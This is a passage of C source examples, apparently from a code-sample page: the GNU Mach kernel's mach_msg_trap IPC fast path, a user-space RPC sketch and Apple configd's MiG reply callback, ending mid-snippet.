			index = MACH_PORT_INDEX(rcv_name);
			gen = MACH_PORT_GEN(rcv_name);

			if (index >= size)
				goto abort_reply_rcv_copyin;

			entry = &table[index];
			bits = entry->ie_bits;

			/* check generation number */

			if ((bits & IE_BITS_GEN_MASK) != gen)
				goto abort_reply_rcv_copyin;
		    }

			/* check type bits; looking for receive or set */

			if (bits & MACH_PORT_TYPE_PORT_SET) {
				ipc_pset_t rcv_pset;

				rcv_pset = (ipc_pset_t) entry->ie_object;
				assert(rcv_pset != IPS_NULL);

				ips_lock(rcv_pset);
				assert(ips_active(rcv_pset));

				rcv_object = (ipc_object_t) rcv_pset;
				rcv_mqueue = &rcv_pset->ips_messages;
			} else if (bits & MACH_PORT_TYPE_RECEIVE) {
				ipc_port_t rcv_port;

				rcv_port = (ipc_port_t) entry->ie_object;
				assert(rcv_port != IP_NULL);

				if (!ip_lock_try(rcv_port))
					goto abort_reply_rcv_copyin;
				assert(ip_active(rcv_port));

				if (rcv_port->ip_pset != IPS_NULL) {
					ip_unlock(rcv_port);
					goto abort_reply_rcv_copyin;
				}

				rcv_object = (ipc_object_t) rcv_port;
				rcv_mqueue = &rcv_port->ip_messages;
			} else
				goto abort_reply_rcv_copyin;
		    }

			is_write_unlock(space);
			io_reference(rcv_object);
			imq_lock(rcv_mqueue);
			io_unlock(rcv_object);
			goto fast_send_receive;

		    abort_reply_dest_copyin:
			is_write_unlock(space);
			goto slow_copyin;

		    abort_reply_rcv_copyin:
			ip_unlock(dest_port);
			is_write_unlock(space);
			goto slow_send;
		    }

		    default:
			goto slow_copyin;
		}
		/*NOTREACHED*/

	    fast_send_receive:
		/*
		 *	optimized ipc_mqueue_send/ipc_mqueue_receive
		 *
		 *	Finished get/copyin of kmsg and copyin of rcv_name.
		 *	space is unlocked, dest_port is locked,
		 *	we can queue kmsg to dest_port,
		 *	rcv_mqueue is locked, rcv_object holds a ref,
		 *	if rcv_object is a port it isn't in a port set
		 *
		 *	Note that if simple locking is turned off,
		 *	then we could have dest_mqueue == rcv_mqueue
		 *	and not abort when we try to lock dest_mqueue.
		 */

		assert(ip_active(dest_port));
		assert(dest_port->ip_receiver != ipc_space_kernel);
		assert((dest_port->ip_msgcount < dest_port->ip_qlimit) ||
		       (MACH_MSGH_BITS_REMOTE(kmsg->ikm_header.msgh_bits) ==
						MACH_MSG_TYPE_PORT_SEND_ONCE));
		assert((kmsg->ikm_header.msgh_bits &
						MACH_MSGH_BITS_CIRCULAR) == 0);

	    {
		ipc_mqueue_t dest_mqueue;
		ipc_thread_t receiver;

	    {
		ipc_pset_t dest_pset;

		dest_pset = dest_port->ip_pset;
		if (dest_pset == IPS_NULL)
			dest_mqueue = &dest_port->ip_messages;
		else
			dest_mqueue = &dest_pset->ips_messages;
	    }

		if (!imq_lock_try(dest_mqueue)) {
		    abort_send_receive:
			ip_unlock(dest_port);
			imq_unlock(rcv_mqueue);
			ipc_object_release(rcv_object);
			goto slow_send;
		}

		receiver = ipc_thread_queue_first(&dest_mqueue->imq_threads);
		if ((receiver == ITH_NULL) ||
		    (ipc_kmsg_queue_first(&rcv_mqueue->imq_messages)
								!= IKM_NULL)) {
			imq_unlock(dest_mqueue);
			goto abort_send_receive;
		}

		/*
		 *	There is a receiver thread waiting, and
		 *	there is no reply message for us to pick up.
		 *	We have hope of hand-off, so save state.
		 */

		self->ith_msg = msg;
		self->ith_rcv_size = rcv_size;
		self->ith_object = rcv_object;
		self->ith_mqueue = rcv_mqueue;

		if ((receiver->swap_func == (void (*)()) mach_msg_continue) &&
		    thread_handoff(self, mach_msg_continue, receiver)) {
			assert(current_thread() == receiver);

			/*
			 *	We can use the optimized receive code,
			 *	because the receiver is using no options.
			 */
		} else if ((receiver->swap_func ==
				(void (*)()) exception_raise_continue) &&
			   thread_handoff(self, mach_msg_continue, receiver)) {
			counter(c_mach_msg_trap_block_exc++);
			assert(current_thread() == receiver);

			/*
			 *	We are a reply message coming back through
			 *	the optimized exception-handling path.
			 *	Finish with rcv_mqueue and dest_mqueue,
			 *	and then jump to exception code with
			 *	dest_port still locked.  We don't bother
			 *	with a sequence number in this case.
			 */

			ipc_thread_enqueue_macro(
				&rcv_mqueue->imq_threads, self);
			self->ith_state = MACH_RCV_IN_PROGRESS;
			self->ith_msize = MACH_MSG_SIZE_MAX;
			imq_unlock(rcv_mqueue);

			ipc_thread_rmqueue_first_macro(
				&dest_mqueue->imq_threads, receiver);
			imq_unlock(dest_mqueue);

			exception_raise_continue_fast(dest_port, kmsg);
			/*NOTREACHED*/
			return MACH_MSG_SUCCESS;
		} else if ((send_size <= receiver->ith_msize) &&
			   thread_handoff(self, mach_msg_continue, receiver)) {
			assert(current_thread() == receiver);

			if ((receiver->swap_func ==
				(void (*)()) mach_msg_receive_continue) &&
			    ((receiver->ith_option & MACH_RCV_NOTIFY) == 0)) {
				/*
				 *	We can still use the optimized code.
				 */
			} else {
				counter(c_mach_msg_trap_block_slow++);
				/*
				 *	We are running as the receiver,
				 *	but we can't use the optimized code.
				 *	Finish send/receive processing.
				 */

				dest_port->ip_msgcount++;
				ip_unlock(dest_port);

				ipc_thread_enqueue_macro(
					&rcv_mqueue->imq_threads, self);
				self->ith_state = MACH_RCV_IN_PROGRESS;
				self->ith_msize = MACH_MSG_SIZE_MAX;
				imq_unlock(rcv_mqueue);

				ipc_thread_rmqueue_first_macro(
					&dest_mqueue->imq_threads, receiver);
				receiver->ith_state = MACH_MSG_SUCCESS;
				receiver->ith_kmsg = kmsg;
				receiver->ith_seqno = dest_port->ip_seqno++;
				imq_unlock(dest_mqueue);

				/*
				 *	Call the receiver's continuation.
				 */

				receiver->wait_result = THREAD_AWAKENED;
				(*receiver->swap_func)();
				/*NOTREACHED*/
				return MACH_MSG_SUCCESS;
			}
		} else {
			/*
			 *	The receiver can't accept the message,
			 *	or we can't switch to the receiver.
			 */

			imq_unlock(dest_mqueue);
			goto abort_send_receive;
		}
		counter(c_mach_msg_trap_block_fast++);

		/*
		 *	Safe to unlock dest_port now that we are
		 *	committed to this path, because we hold
		 *	dest_mqueue locked.  We never bother changing
		 *	dest_port->ip_msgcount.
		 */

		ip_unlock(dest_port);

		/*
		 *	We need to finish preparing self for its
		 *	time asleep in rcv_mqueue.
		 */

		ipc_thread_enqueue_macro(&rcv_mqueue->imq_threads, self);
		self->ith_state = MACH_RCV_IN_PROGRESS;
		self->ith_msize = MACH_MSG_SIZE_MAX;
		imq_unlock(rcv_mqueue);

		/*
		 *	Finish extracting receiver from dest_mqueue.
		 */

		ipc_thread_rmqueue_first_macro(
			&dest_mqueue->imq_threads, receiver);
		kmsg->ikm_header.msgh_seqno = dest_port->ip_seqno++;
		imq_unlock(dest_mqueue);

		/*
		 *	We don't have to do any post-dequeue processing of
		 *	the message.  We never incremented ip_msgcount, we
		 *	know it has no msg-accepted request, and blocked
		 *	senders aren't a worry because we found the port
		 *	with a receiver waiting.
		 */

		self = receiver;
		space = self->task->itk_space;

		msg = self->ith_msg;
		rcv_size = self->ith_rcv_size;
		rcv_object = self->ith_object;

		/* inline ipc_object_release */
		io_lock(rcv_object);
		io_release(rcv_object);
		io_check_unlock(rcv_object);
	    }

	    fast_copyout:
		/*
		 *	Nothing locked and no references held, except
		 *	we have kmsg with msgh_seqno filled in.  Must
		 *	still check against rcv_size and do
		 *	ipc_kmsg_copyout/ipc_kmsg_put.
		 */

		assert((ipc_port_t) kmsg->ikm_header.msgh_remote_port
						== dest_port);

		reply_size = kmsg->ikm_header.msgh_size;
		if (rcv_size < reply_size)
			goto slow_copyout;

		/* optimized ipc_kmsg_copyout/ipc_kmsg_copyout_header */

		switch (kmsg->ikm_header.msgh_bits) {
		    case MACH_MSGH_BITS(MACH_MSG_TYPE_PORT_SEND,
					MACH_MSG_TYPE_PORT_SEND_ONCE): {
			ipc_port_t reply_port =
				(ipc_port_t) kmsg->ikm_header.msgh_local_port;
			mach_port_t dest_name, reply_name;

			/* receiving a request message */

			if (!IP_VALID(reply_port))
				goto slow_copyout;

			is_write_lock(space);
			assert(space->is_active);

			/*
			 *	To do an atomic copyout, need simultaneous
			 *	locks on both ports and the space.  If
			 *	dest_port == reply_port, and simple locking is
			 *	enabled, then we will abort.  Otherwise it's
			 *	OK to unlock twice.
			 */

			ip_lock(dest_port);
			if (!ip_active(dest_port) ||
			    !ip_lock_try(reply_port))
				goto abort_request_copyout;

			if (!ip_active(reply_port)) {
				ip_unlock(reply_port);
				goto abort_request_copyout;
			}

			assert(reply_port->ip_sorights > 0);
			ip_unlock(reply_port);

		    {
			ipc_entry_t table;
			ipc_entry_t entry;
			mach_port_index_t index;

			/* optimized ipc_entry_get */

			table = space->is_table;
			index = table->ie_next;

			if (index == 0)
				goto abort_request_copyout;

			entry = &table[index];
			table->ie_next = entry->ie_next;
			entry->ie_request = 0;

		    {
			mach_port_gen_t gen;

			assert((entry->ie_bits &~ IE_BITS_GEN_MASK) == 0);
			gen = entry->ie_bits + IE_BITS_GEN_ONE;

			reply_name = MACH_PORT_MAKE(index, gen);

			/* optimized ipc_right_copyout */

			entry->ie_bits = gen | (MACH_PORT_TYPE_SEND_ONCE | 1);
		    }

			assert(MACH_PORT_VALID(reply_name));
			entry->ie_object = (ipc_object_t) reply_port;
			is_write_unlock(space);
		    }

			/* optimized ipc_object_copyout_dest */

			assert(dest_port->ip_srights > 0);
			ip_release(dest_port);

			if (dest_port->ip_receiver == space)
				dest_name = dest_port->ip_receiver_name;
			else
				dest_name = MACH_PORT_NULL;

			if ((--dest_port->ip_srights == 0) &&
			    (dest_port->ip_nsrequest != IP_NULL)) {
				ipc_port_t nsrequest;
				mach_port_mscount_t mscount;

				/* a rather rare case */

				nsrequest = dest_port->ip_nsrequest;
				mscount = dest_port->ip_mscount;
				dest_port->ip_nsrequest = IP_NULL;
				ip_unlock(dest_port);

				ipc_notify_no_senders(nsrequest, mscount);
			} else
				ip_unlock(dest_port);

			if (! ipc_port_flag_protected_payload(dest_port)) {
				kmsg->ikm_header.msgh_bits = MACH_MSGH_BITS(
					MACH_MSG_TYPE_PORT_SEND_ONCE,
					MACH_MSG_TYPE_PORT_SEND);
				kmsg->ikm_header.msgh_local_port = dest_name;
			} else {
				kmsg->ikm_header.msgh_bits = MACH_MSGH_BITS(
					MACH_MSG_TYPE_PORT_SEND_ONCE,
					MACH_MSG_TYPE_PROTECTED_PAYLOAD);
				kmsg->ikm_header.msgh_protected_payload =
					dest_port->ip_protected_payload;
			}
			kmsg->ikm_header.msgh_remote_port = reply_name;
			goto fast_put;

		    abort_request_copyout:
			ip_unlock(dest_port);
			is_write_unlock(space);
			goto slow_copyout;
		    }

		    case MACH_MSGH_BITS(MACH_MSG_TYPE_PORT_SEND_ONCE, 0): {
			mach_port_t dest_name;

			/* receiving a reply message */

			ip_lock(dest_port);
			if (!ip_active(dest_port))
				goto slow_copyout;

			/* optimized ipc_object_copyout_dest */

			assert(dest_port->ip_sorights > 0);

			if (dest_port->ip_receiver == space) {
				ip_release(dest_port);
				dest_port->ip_sorights--;
				dest_name = dest_port->ip_receiver_name;
				ip_unlock(dest_port);
			} else {
				ip_unlock(dest_port);

				ipc_notify_send_once(dest_port);
				dest_name = MACH_PORT_NULL;
			}

			if (! ipc_port_flag_protected_payload(dest_port)) {
				kmsg->ikm_header.msgh_bits = MACH_MSGH_BITS(
					0,
					MACH_MSG_TYPE_PORT_SEND_ONCE);
				kmsg->ikm_header.msgh_local_port = dest_name;
			} else {
				kmsg->ikm_header.msgh_bits = MACH_MSGH_BITS(
					0,
					MACH_MSG_TYPE_PROTECTED_PAYLOAD);
				kmsg->ikm_header.msgh_protected_payload =
					dest_port->ip_protected_payload;
			}
			kmsg->ikm_header.msgh_remote_port = MACH_PORT_NULL;
			goto fast_put;
		    }

		    case MACH_MSGH_BITS_COMPLEX|
			 MACH_MSGH_BITS(MACH_MSG_TYPE_PORT_SEND_ONCE, 0): {
			mach_port_t dest_name;

			/* receiving a complex reply message */

			ip_lock(dest_port);
			if (!ip_active(dest_port))
				goto slow_copyout;

			/* optimized ipc_object_copyout_dest */

			assert(dest_port->ip_sorights > 0);

			if (dest_port->ip_receiver == space) {
				ip_release(dest_port);
				dest_port->ip_sorights--;
				dest_name = dest_port->ip_receiver_name;
				ip_unlock(dest_port);
			} else {
				ip_unlock(dest_port);

				ipc_notify_send_once(dest_port);
				dest_name = MACH_PORT_NULL;
			}

			if (! ipc_port_flag_protected_payload(dest_port)) {
				kmsg->ikm_header.msgh_bits =
					MACH_MSGH_BITS_COMPLEX
					| MACH_MSGH_BITS(
						0,
						MACH_MSG_TYPE_PORT_SEND_ONCE);
				kmsg->ikm_header.msgh_local_port = dest_name;
			} else {
				kmsg->ikm_header.msgh_bits =
					MACH_MSGH_BITS_COMPLEX
					| MACH_MSGH_BITS(
					    0,
					    MACH_MSG_TYPE_PROTECTED_PAYLOAD);
				kmsg->ikm_header.msgh_protected_payload =
					dest_port->ip_protected_payload;
			}
			kmsg->ikm_header.msgh_remote_port = MACH_PORT_NULL;

			mr = ipc_kmsg_copyout_body(
				(vm_offset_t) (&kmsg->ikm_header + 1),
				(vm_offset_t) &kmsg->ikm_header
					+ kmsg->ikm_header.msgh_size,
				space,
				current_map());

			if (mr != MACH_MSG_SUCCESS) {
				(void) ipc_kmsg_put(msg, kmsg,
					kmsg->ikm_header.msgh_size);
				return mr | MACH_RCV_BODY_ERROR;
			}
			goto fast_put;
		    }

		    default:
			goto slow_copyout;
		}
		/*NOTREACHED*/

	    fast_put:
		/*
		 *	We have the reply message data in kmsg,
		 *	and the reply message size in reply_size.
		 *	Just need to copy it out to the user and free kmsg.
		 *	We must check ikm_cache after copyoutmsg.
		 */

		ikm_check_initialized(kmsg, kmsg->ikm_size);

		if ((kmsg->ikm_size != IKM_SAVED_KMSG_SIZE) ||
		    copyoutmsg(&kmsg->ikm_header, msg,
			       reply_size) ||
		    (ikm_cache() != IKM_NULL))
			goto slow_put;

		ikm_cache() = kmsg;
		thread_syscall_return(MACH_MSG_SUCCESS);
		/*NOTREACHED*/
		return MACH_MSG_SUCCESS; /* help for the compiler */

		/*
		 *	The slow path has a few non-register temporary
		 *	variables used only for call-by-reference.
		 */

	    {
		ipc_kmsg_t temp_kmsg;
		mach_port_seqno_t temp_seqno;
		ipc_object_t temp_rcv_object;
		ipc_mqueue_t temp_rcv_mqueue;

	    slow_get:
		/*
		 *	No locks, references, or messages held.
		 *	Still have to get the request, send it,
		 *	receive reply, etc.
		 */

		mr = ipc_kmsg_get(msg, send_size, &temp_kmsg);
		if (mr != MACH_MSG_SUCCESS) {
			thread_syscall_return(mr);
			/*NOTREACHED*/
		}
		kmsg = temp_kmsg;

		/* try to get back on optimized path */
		goto fast_copyin;

	    slow_copyin:
		/*
		 *	We have the message data in kmsg, but
		 *	we still need to copyin, send it,
		 *	receive a reply, and do copyout.
		 */

		mr = ipc_kmsg_copyin(kmsg, space, current_map(),
				     MACH_PORT_NULL);
		if (mr != MACH_MSG_SUCCESS) {
			ikm_free(kmsg);
			thread_syscall_return(mr);
			/*NOTREACHED*/
		}

		/* try to get back on optimized path */

		if (kmsg->ikm_header.msgh_bits & MACH_MSGH_BITS_CIRCULAR)
			goto slow_send;

		dest_port = (ipc_port_t) kmsg->ikm_header.msgh_remote_port;
		assert(IP_VALID(dest_port));

		ip_lock(dest_port);
		if (dest_port->ip_receiver == ipc_space_kernel) {
			assert(ip_active(dest_port));
			ip_unlock(dest_port);
			goto kernel_send;
		}

		if (ip_active(dest_port) &&
		    ((dest_port->ip_msgcount < dest_port->ip_qlimit) ||
		     (MACH_MSGH_BITS_REMOTE(kmsg->ikm_header.msgh_bits) ==
					MACH_MSG_TYPE_PORT_SEND_ONCE)))
		{
		    /*
		     *	Try an optimized ipc_mqueue_copyin.
		     *	It will work if this is a request message.
		     */

		    ipc_port_t reply_port;

		    reply_port = (ipc_port_t)
					kmsg->ikm_header.msgh_local_port;
		    if (IP_VALID(reply_port)) {
			if (ip_lock_try(reply_port)) {
			    if (ip_active(reply_port) &&
				reply_port->ip_receiver == space &&
				reply_port->ip_receiver_name == rcv_name &&
				reply_port->ip_pset == IPS_NULL)
			    {
				/* Grab a reference to the reply port. */
				rcv_object = (ipc_object_t) reply_port;
				io_reference(rcv_object);
				rcv_mqueue = &reply_port->ip_messages;
				imq_lock(rcv_mqueue);
				io_unlock(rcv_object);
				goto fast_send_receive;
			    }
			    ip_unlock(reply_port);
			}
		    }
		}

		ip_unlock(dest_port);
		goto slow_send;

	    kernel_send:
		/*
		 *	Special case: send message to kernel services.
		 *	The request message has been copied into the
		 *	kmsg.  Nothing is locked.
		 */

	    {
		ipc_port_t	reply_port;

		/*
		 * Perform the kernel function.
		 */

		kmsg = ipc_kobject_server(kmsg);
		if (kmsg == IKM_NULL) {
			/*
			 * No reply.  Take the
			 * slow receive path.
			 */
			goto slow_get_rcv_port;
		}

		/*
		 * Check that:
		 *	the reply port is alive
		 *	we hold the receive right
		 *	the name has not changed.
		 *	the port is not in a set
		 * If any of these are not true,
		 * we cannot directly receive the reply
		 * message.
		 */
		reply_port = (ipc_port_t) kmsg->ikm_header.msgh_remote_port;
		ip_lock(reply_port);

		if ((!ip_active(reply_port)) ||
		    (reply_port->ip_receiver != space) ||
		    (reply_port->ip_receiver_name != rcv_name) ||
		    (reply_port->ip_pset != IPS_NULL))
		{
			ip_unlock(reply_port);
			ipc_mqueue_send_always(kmsg);
			goto slow_get_rcv_port;
		}

		rcv_mqueue = &reply_port->ip_messages;
		imq_lock(rcv_mqueue);
		/* keep port locked, and don't change ref count yet */

		/*
		 * If there are messages on the port
		 * or other threads waiting for a message,
		 * we cannot directly receive the reply.
		 */
		if ((ipc_thread_queue_first(&rcv_mqueue->imq_threads)
			!= ITH_NULL) ||
		    (ipc_kmsg_queue_first(&rcv_mqueue->imq_messages)
			!= IKM_NULL))
		{
			imq_unlock(rcv_mqueue);
			ip_unlock(reply_port);
			ipc_mqueue_send_always(kmsg);
			goto slow_get_rcv_port;
		}

		/*
		 * We can directly receive this reply.
		 * Since the kernel reply never blocks,
		 * it holds no message_accepted request.
		 * Since there were no messages queued
		 * on the reply port, there should be
		 * no threads blocked waiting to send.
		 */

		assert(kmsg->ikm_marequest == IMAR_NULL);
		assert(ipc_thread_queue_first(&reply_port->ip_blocked)
				== ITH_NULL);

		dest_port = reply_port;
		kmsg->ikm_header.msgh_seqno = dest_port->ip_seqno++;
		imq_unlock(rcv_mqueue);

		/*
		 * inline ipc_object_release.
		 * Port is still locked.
		 * Reference count was not incremented.
		 */
		ip_check_unlock(reply_port);

		/* copy out the kernel reply */
		goto fast_copyout;
	    }

	    slow_send:
		/*
		 *	Nothing is locked.  We have acquired kmsg, but
		 *	we still need to send it and receive a reply.
		 */

		mr = ipc_mqueue_send(kmsg, MACH_MSG_OPTION_NONE,
				     MACH_MSG_TIMEOUT_NONE);
		if (mr != MACH_MSG_SUCCESS) {
			mr |= ipc_kmsg_copyout_pseudo(kmsg, space,
						      current_map());

			assert(kmsg->ikm_marequest == IMAR_NULL);
			(void) ipc_kmsg_put(msg, kmsg,
					    kmsg->ikm_header.msgh_size);
			thread_syscall_return(mr);
			/*NOTREACHED*/
		}

	    slow_get_rcv_port:
		/*
		 * We have sent the message.  Copy in the receive port.
		 */
		mr = ipc_mqueue_copyin(space, rcv_name,
				       &temp_rcv_mqueue, &temp_rcv_object);
		if (mr != MACH_MSG_SUCCESS) {
			thread_syscall_return(mr);
			/*NOTREACHED*/
		}
		rcv_mqueue = temp_rcv_mqueue;
		rcv_object = temp_rcv_object;
		/* hold ref for rcv_object; rcv_mqueue is locked */

	/*
	    slow_receive:
	*/
		/*
		 *	Now we have sent the request and copied in rcv_name,
		 *	so rcv_mqueue is locked and hold ref for rcv_object.
		 *	Just receive a reply and try to get back to fast path.
		 *
		 *	ipc_mqueue_receive may not return, because if we block
		 *	then our kernel stack may be discarded.  So we save
		 *	state here for mach_msg_continue to pick up.
		 */

		self->ith_msg = msg;
		self->ith_rcv_size = rcv_size;
		self->ith_object = rcv_object;
		self->ith_mqueue = rcv_mqueue;

		mr = ipc_mqueue_receive(rcv_mqueue,
					MACH_MSG_OPTION_NONE,
					MACH_MSG_SIZE_MAX,
					MACH_MSG_TIMEOUT_NONE,
					FALSE, mach_msg_continue,
		       			&temp_kmsg, &temp_seqno);
		/* rcv_mqueue is unlocked */
		ipc_object_release(rcv_object);
		if (mr != MACH_MSG_SUCCESS) {
			thread_syscall_return(mr);
			/*NOTREACHED*/
		}

		(kmsg = temp_kmsg)->ikm_header.msgh_seqno = temp_seqno;
		dest_port = (ipc_port_t) kmsg->ikm_header.msgh_remote_port;
		goto fast_copyout;

	    slow_copyout:
		/*
		 *	Nothing locked and no references held, except
		 *	we have kmsg with msgh_seqno filled in.  Must
		 *	still check against rcv_size and do
		 *	ipc_kmsg_copyout/ipc_kmsg_put.
		 */

		reply_size = kmsg->ikm_header.msgh_size;
		if (rcv_size < reply_size) {
			ipc_kmsg_copyout_dest(kmsg, space);
			(void) ipc_kmsg_put(msg, kmsg, sizeof *msg);
			thread_syscall_return(MACH_RCV_TOO_LARGE);
			/*NOTREACHED*/
		}

		mr = ipc_kmsg_copyout(kmsg, space, current_map(),
				      MACH_PORT_NULL);
		if (mr != MACH_MSG_SUCCESS) {
			if ((mr &~ MACH_MSG_MASK) == MACH_RCV_BODY_ERROR) {
				(void) ipc_kmsg_put(msg, kmsg,
						kmsg->ikm_header.msgh_size);
			} else {
				ipc_kmsg_copyout_dest(kmsg, space);
				(void) ipc_kmsg_put(msg, kmsg, sizeof *msg);
			}

			thread_syscall_return(mr);
			/*NOTREACHED*/
		}

		/* try to get back on optimized path */

		goto fast_put;

	    slow_put:
		mr = ipc_kmsg_put(msg, kmsg, reply_size);
		thread_syscall_return(mr);
		/*NOTREACHED*/
	    }
	} else if (option == MACH_SEND_MSG) {
		ipc_space_t space = current_space();
		vm_map_t map = current_map();
		ipc_kmsg_t kmsg;

		mr = ipc_kmsg_get(msg, send_size, &kmsg);
		if (mr != MACH_MSG_SUCCESS)
			return mr;

		mr = ipc_kmsg_copyin(kmsg, space, map, MACH_PORT_NULL);
		if (mr != MACH_MSG_SUCCESS) {
			ikm_free(kmsg);
			return mr;
		}

		mr = ipc_mqueue_send(kmsg, MACH_MSG_OPTION_NONE,
				     MACH_MSG_TIMEOUT_NONE);
		if (mr != MACH_MSG_SUCCESS) {
			mr |= ipc_kmsg_copyout_pseudo(kmsg, space, map);

			assert(kmsg->ikm_marequest == IMAR_NULL);
			(void) ipc_kmsg_put(msg, kmsg,
					    kmsg->ikm_header.msgh_size);
		}

		return mr;
	} else if (option == MACH_RCV_MSG) {
		ipc_thread_t self = current_thread();
		ipc_space_t space = current_space();
		vm_map_t map = current_map();
		ipc_object_t object;
		ipc_mqueue_t mqueue;
		ipc_kmsg_t kmsg;
		mach_port_seqno_t seqno;

		mr = ipc_mqueue_copyin(space, rcv_name, &mqueue, &object);
		if (mr != MACH_MSG_SUCCESS)
			return mr;
		/* hold ref for object; mqueue is locked */

		/*
		 *	ipc_mqueue_receive may not return, because if we block
		 *	then our kernel stack may be discarded.  So we save
		 *	state here for mach_msg_continue to pick up.
		 */

		self->ith_msg = msg;
		self->ith_rcv_size = rcv_size;
		self->ith_object = object;
		self->ith_mqueue = mqueue;

		mr = ipc_mqueue_receive(mqueue,
					MACH_MSG_OPTION_NONE,
					MACH_MSG_SIZE_MAX,
					MACH_MSG_TIMEOUT_NONE,
					FALSE, mach_msg_continue,
					&kmsg, &seqno);
		/* mqueue is unlocked */
		ipc_object_release(object);
		if (mr != MACH_MSG_SUCCESS)
			return mr;

		kmsg->ikm_header.msgh_seqno = seqno;
		if (rcv_size < kmsg->ikm_header.msgh_size) {
			ipc_kmsg_copyout_dest(kmsg, space);
			(void) ipc_kmsg_put(msg, kmsg, sizeof *msg);
			return MACH_RCV_TOO_LARGE;
		}

		mr = ipc_kmsg_copyout(kmsg, space, map, MACH_PORT_NULL);
		if (mr != MACH_MSG_SUCCESS) {
			if ((mr &~ MACH_MSG_MASK) == MACH_RCV_BODY_ERROR) {
				(void) ipc_kmsg_put(msg, kmsg,
						kmsg->ikm_header.msgh_size);
			} else {
				ipc_kmsg_copyout_dest(kmsg, space);
				(void) ipc_kmsg_put(msg, kmsg, sizeof *msg);
			}

			return mr;
		}

		return ipc_kmsg_put(msg, kmsg, kmsg->ikm_header.msgh_size);
	} else if (option == MACH_MSG_OPTION_NONE) {
		/*
		 *	We can measure the "null mach_msg_trap"
		 *	(syscall entry and thread_syscall_return exit)
		 *	with this path.
		 */

		thread_syscall_return(MACH_MSG_SUCCESS);
		/*NOTREACHED*/
	}

	if (option & MACH_SEND_MSG) {
		mr = mach_msg_send(msg, option, send_size,
				   time_out, notify);
		if (mr != MACH_MSG_SUCCESS)
			return mr;
	}

	if (option & MACH_RCV_MSG) {
		mr = mach_msg_receive(msg, option, rcv_size, rcv_name,
				      time_out, notify);
		if (mr != MACH_MSG_SUCCESS)
			return mr;
	}

	return MACH_MSG_SUCCESS;
}
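The combined send/receive fast path above is entered only when the caller's message looks like a classic RPC request: a copied send right to the server, a make-send-once reply right naming the same port that is passed as rcv_name, and MACH_SEND_MSG|MACH_RCV_MSG in a single trap. A user-space sketch of that shape, using the old-format Mach interface; the header, message id, and buffer size are illustrative:

#include <mach.h>		/* GNU Mach / Hurd user-space header (assumption) */

/* Sketch of the request shape recognized by the fast_copyin request case:
 * destination carried as a copied send right, reply as a make-send-once
 * right on the very port we then receive on, both in one trap. */
union rpc_buffer {
	mach_msg_header_t head;
	char space[128];			/* illustrative room for the reply */
};

mach_msg_return_t
do_rpc(mach_port_t server, mach_port_t reply_port, mach_msg_id_t id)
{
	union rpc_buffer buf;

	buf.head.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND,
					    MACH_MSG_TYPE_MAKE_SEND_ONCE);
	buf.head.msgh_size = sizeof (mach_msg_header_t);	/* header-only request */
	buf.head.msgh_remote_port = server;	/* destination: send right we keep */
	buf.head.msgh_local_port = reply_port;	/* reply: receive right we own */
	buf.head.msgh_id = id;

	/* msgh_local_port == rcv_name is what keeps mach_msg_trap on the
	 * optimized path; anything else falls through to slow_copyin. */
	return mach_msg(&buf.head, MACH_SEND_MSG | MACH_RCV_MSG,
			sizeof (mach_msg_header_t), sizeof buf, reply_port,
			MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
}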
Esempio n. 30
0
__private_extern__
void
configdCallback(CFMachPortRef port, void *msg, CFIndex size, void *info)
{
	mig_reply_error_t *	bufRequest	= msg;
	uint32_t		bufReply_q[MACH_MSG_BUFFER_SIZE/sizeof(uint32_t)];
	mig_reply_error_t *	bufReply	= (mig_reply_error_t *)bufReply_q;
	static CFIndex		bufSize		= 0;
	mach_msg_return_t	mr;
	int			options;

	if (bufSize == 0) {
		// get max size for MiG reply buffers
		bufSize = _config_subsystem.maxsize;

		// check if our on-the-stack reply buffer will be big enough
		if (bufSize > sizeof(bufReply_q)) {
			SCLog(TRUE, LOG_NOTICE,
			      CFSTR("configdCallback(): buffer size should be increased > %d"),
			      _config_subsystem.maxsize);
		}
	}

	if (bufSize > sizeof(bufReply_q)) {
		bufReply = CFAllocatorAllocate(NULL, _config_subsystem.maxsize, 0);
	}
	bufReply->RetCode = 0;

	/* we have a request message */
	(void) config_demux(&bufRequest->Head, &bufReply->Head);

	if (!(bufReply->Head.msgh_bits & MACH_MSGH_BITS_COMPLEX)) {
		if (bufReply->RetCode == MIG_NO_REPLY) {
			bufReply->Head.msgh_remote_port = MACH_PORT_NULL;
		} else if ((bufReply->RetCode != KERN_SUCCESS) &&
			   (bufRequest->Head.msgh_bits & MACH_MSGH_BITS_COMPLEX)) {
			/*
			 * destroy the request - but not the reply port
			 */
			bufRequest->Head.msgh_remote_port = MACH_PORT_NULL;
			mach_msg_destroy(&bufRequest->Head);
		}
	}

	if (bufReply->Head.msgh_remote_port != MACH_PORT_NULL) {
		/*
		 * send reply.
		 *
		 * We don't want to block indefinitely because the client
		 * isn't receiving messages from the reply port.
		 * If we have a send-once right for the reply port, then
		 * this isn't a concern because the send won't block.
		 * If we have a send right, we need to use MACH_SEND_TIMEOUT.
		 * To avoid falling off the kernel's fast RPC path unnecessarily,
		 * we only supply MACH_SEND_TIMEOUT when absolutely necessary.
		 */

		options = MACH_SEND_MSG;
		if (MACH_MSGH_BITS_REMOTE(bufReply->Head.msgh_bits) != MACH_MSG_TYPE_MOVE_SEND_ONCE) {
			options |= MACH_SEND_TIMEOUT;
		}
		mr = mach_msg(&bufReply->Head,		/* msg */
			      options,			/* option */
			      bufReply->Head.msgh_size,	/* send_size */
			      0,			/* rcv_size */
			      MACH_PORT_NULL,		/* rcv_name */
			      MACH_MSG_TIMEOUT_NONE,	/* timeout */
			      MACH_PORT_NULL);		/* notify */

		/* Has a message error occurred? */
		switch (mr) {
			case MACH_SEND_INVALID_DEST:
			case MACH_SEND_TIMED_OUT:
				break;
			default :
				/* Includes success case.  */
				goto done;
		}
	}

	if (bufReply->Head.msgh_bits & MACH_MSGH_BITS_COMPLEX) {
		mach_msg_destroy(&bufReply->Head);
	}

    done :

	if (bufReply != (mig_reply_error_t *)bufReply_q)
		CFAllocatorDeallocate(NULL, bufReply);
	return;
}
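A callback with this signature is normally delivered through a CFMachPort run-loop source. A sketch of that registration; the helper name is illustrative, and the real configd wiring goes through its own SCDynamicStore/MiG glue rather than this direct setup:

#include <CoreFoundation/CoreFoundation.h>

/* Illustrative registration of a CFMachPortCallBack such as configdCallback. */
static void
attach_server_callback(CFMachPortCallBack callback)
{
	CFMachPortContext	context	= { 0, NULL, NULL, NULL, NULL };
	CFMachPortRef		port;
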